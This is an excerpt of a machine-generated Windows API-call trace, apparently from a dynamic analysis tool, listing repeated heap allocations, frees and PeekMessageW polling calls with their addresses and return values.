RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0167.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0167.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0167.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0167.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0167.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.798] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.798] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.799] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.799] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.799] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 